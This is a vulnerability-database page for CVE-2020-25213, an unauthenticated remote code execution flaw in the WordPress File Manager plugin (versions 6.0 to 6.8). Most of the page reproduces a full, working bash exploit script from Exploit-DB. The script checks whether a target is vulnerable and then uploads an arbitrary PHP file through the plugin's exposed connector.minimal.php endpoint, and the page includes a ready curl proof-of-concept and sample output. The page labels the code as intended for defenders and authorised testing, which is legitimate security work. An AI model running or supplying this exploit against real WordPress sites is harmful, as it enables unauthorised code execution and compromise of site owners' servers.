CVE-2020-25213
Description
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
CISA KEV
- Vendor
- WordPress
- Product
- File Manager Plugin
- Due date
- 2022-05-03
Predictions
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Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
WordPress Plugin Wp-FileManager 6.8 - RCE
# Exploit Title: WordPress Plugin Wp-FileManager 6.8 - RCE
# Date: September 4,2020
# Exploit Author: Mansoor R (@time4ster)
# CVE: CVE-2020-25213
# Version Affected: 6.0 to 6.8
# Vendor URL: https://wordpress.org/plugins/wp-file-manager/
# Patch: Upgrade to wp-file-manager 6.9 (or above)
# Tested on: wp-file-manager 6.0 (https://downloads.wordpress.org/plugin/wp-file-manager.6.0.zip) on Ubuntu 18.04
#!/bin/bash
#Description:
#The core of the issue began with the File Manager plugin renaming the extension on the elFinder libraryβs connector.minimal.php.dist file to .php so it could be executed directly, even though the connector file was not used by the File Manager itself. Such libraries often include example files that are not intended to be used βas-isβ without adding access controls, and this file had no direct access restrictions, meaning the file could be accessed by anyone. This file could be used to initiate an elFinder command and was hooked to the elFinderConnector.class.php file
#Using connector.minimal.php file attacker can upload arbitrary file to the target (unauthenticated) & thus can achieve Remote code Execution.
#Patch commit details:
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2373068%40wp-file-manager%2Ftrunk&old=2372895%40wp-file-manager%2Ftrunk&sfp_email=&sfph_mail=
#Reference
#https://nvd.nist.gov/vuln/detail/CVE-2020-25213
#Credits:
#1. https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/
#2. https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/
##WARNINGS:
#Only test the exploit on websites you are authorized to.
#Don't upload reverse shell payloads or any files that can cause harm to organization.
#Also note that the uploaded files can be accessed by anyone unless secured by password.
## Usage:
# ========
# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress --check
#
# ============================================================================================
# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
#
# By: Mansoor R (@time4ster)
# ============================================================================================
#
# [+] Found wp-file-manager version: 6.0
# [+] Version appears to be vulnerable
# [+] Target: http://192.168.1.54/wordpress is vulnerable
#
# root@Hackintosh:~# ./wp-file-manager-exploit.sh -u http://192.168.1.54/wordpress -f /tmp/mypoc.php --verbose
#
# ============================================================================================
# wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]
#
# By: Mansoor R (@time4ster)
# ============================================================================================
#
# curl POC :
# curl -ks --max-time 5 --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" -F "upload[]=@//tmp/mypoc.php" "http://192.168.1.54/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
#
# [+] W00t! W00t! File uploaded successfully.
# Location: /wordpress/wp-content/plugins/wp-file-manager/lib/php/../files/mypoc.php
# Exploit
#==========
echo
echo "============================================================================================"
echo "wp-file-manager unauthenticated arbitrary file upload (RCE) Exploit [CVE-2020-25213]"
echo
echo "By: Mansoor R (@time4ster)"
echo "============================================================================================"
echo
function printHelp()
{
echo -e "
Usage:
-u|--wp_url <string> Wordpress target url
-f|--upload_file <string> Absolute location of local file to upload on the target. (relative path will not work)
-k|--check Only checks whether the vulnerable endpoint exists & have particular fingerprint or not. No file is uploaded.
-v|--verbose Also prints curl command which is going to be executed
-h|--help Print Help menu
Example:
./wp-file-manager-exploit.sh --wp_url https://www.example.com/wordpress --check
./wp-file-manager-exploit.sh --wp_url https://wordpress.example.com/ -f /tmp/php_hello.php --verbose
"
}
check="false"
verbose="false"
#Processing arguments
while [[ "$#" -gt 0 ]]
do
key="$1"
case "$key" in
-u|--wp_url)
wp_url="$2"
shift
shift # past argument
;;
-f|--upload_file)
upload_file="$2"
shift
shift
;;
-k|--check)
check="true"
shift
shift
;;
-v|--verbose)
verbose="true"
shift
;;
-h|--help)
printHelp
exit
shift
;;
*)
echo [-] Enter valid options
exit
;;
esac
done
[[ -z "$wp_url" ]] && echo "[-] Supply wordpress target URL." && exit
[[ -z "$upload_file" ]] && [[ "$check" == "false" ]] && echo "[-] Either supply --upload_file or --check" && exit
[[ -n "$upload_file" ]] && [[ ! -s "$upload_file" ]] && echo "[-] File supplied is either empty or not exist." && exit
#Script have dependency on jq
jq_cmd=$(command -v jq)
[[ -z "$jq_cmd" ]] && echo -e "[-] Script have dependency on jq. Insall jq from your package manager.\nFor debian based distro install using command: apt install jq" && exit
function checkWPFileManagerVersion()
{ #Takes 1 argument: url
declare url="$1"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/readme.txt"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
declare is_vulnerable="true"
#declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -i "Stable tag: ")
declare version=$( curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint" | grep -A 5 "== Changelog ==" | grep -E -o "[0-9]\.[0-9]" | head -n 1 )
if [ -n "$version" ];then
#declare version=$(echo "$response" | awk {'print $3'})
echo "[+] Found wp-file-manager version: $version"
patched_version="6.9"
#if [ $(awk 'BEGIN {print ('$version' > '6.9'}') ]; then
smaller_version=$(echo -e "$version\n$patched_version" | sort -n | head -n 1)
if [ "$version" != "$patched_version" ] && [ "$smaller_version" == "$version" ];then
echo "[+] Version appears to be vulnerable"
else
echo "[-] Version don't appears to be vulnerable"
is_vulnerable=false
fi
else echo "[-] Unable to detect version. May be wp-file-manager plugin not installed."
is_vulnerable=false
fi
if [ "$is_vulnerable" == "false" ];
then
echo -n "Do you still want to continue (y/N) : "
read choice
[[ "$choice" == "y" ]] || [[ "$choice" == "Y" ]] && echo && return
exit
fi
}
function checkWPFileManager()
{ #Takes 1 argument: url
declare url="$1"
#Checking wp-file-manager plugin version:
checkWPFileManagerVersion "$url"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
declare response=$(curl -ks --max-time 5 --user-agent "$user_agent" "$target_endpoint")
#echo "$response"
#{"error":["errUnknownCmd"]} is returned when vulnerable endpoint is hit
declare is_vulnerable=$(echo "$response" | grep "\{\"error\":\[\"errUnknownCmd\"\]\}")
[[ -n "$is_vulnerable" ]] && echo "[+] Target: $url is vulnerable"
[[ -z "$is_vulnerable" ]] && echo "[-] Target: $url is not vulnerable"
}
function exploitWPFileManager()
{ #Takes 3 arguments: url & file_upload & verbose(true/false)
declare url="$1"
declare file_upload="$2"
declare verbose="$3"
declare target_endpoint="$url/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
declare user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36"
if [ "$verbose" == "true" ];then
echo "curl POC :"
echo "curl -ks --max-time 5 --user-agent \"$user_agent\" -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"$target_endpoint\" "
echo
fi
response=$(curl -ks --max-time 5 --user-agent "$user_agent" -F "reqid=17457a1fe6959" -F "cmd=upload" -F "target=l1_Lw" -F "mtime[]=1576045135" \
-F "upload[]=@/$file_upload" \
"$target_endpoint" )
#echo "$response"
file_upload_url=$(echo "$response" | jq -r .added[0].url 2>/dev/null)
[[ -n "$file_upload_url" ]] && echo -e "[+] W00t! W00t! File uploaded successfully.\nLocation: $file_upload_url "
[[ -z "$file_upload_url" ]] && echo "[-] File upload failed."
}
[[ "$check" == "true" ]] && checkWPFileManager "$wp_url"
[[ -s "$upload_file" ]] && exploitWPFileManager "$wp_url" "$upload_file" "$verbose"
echo
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
Metasploit modules
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
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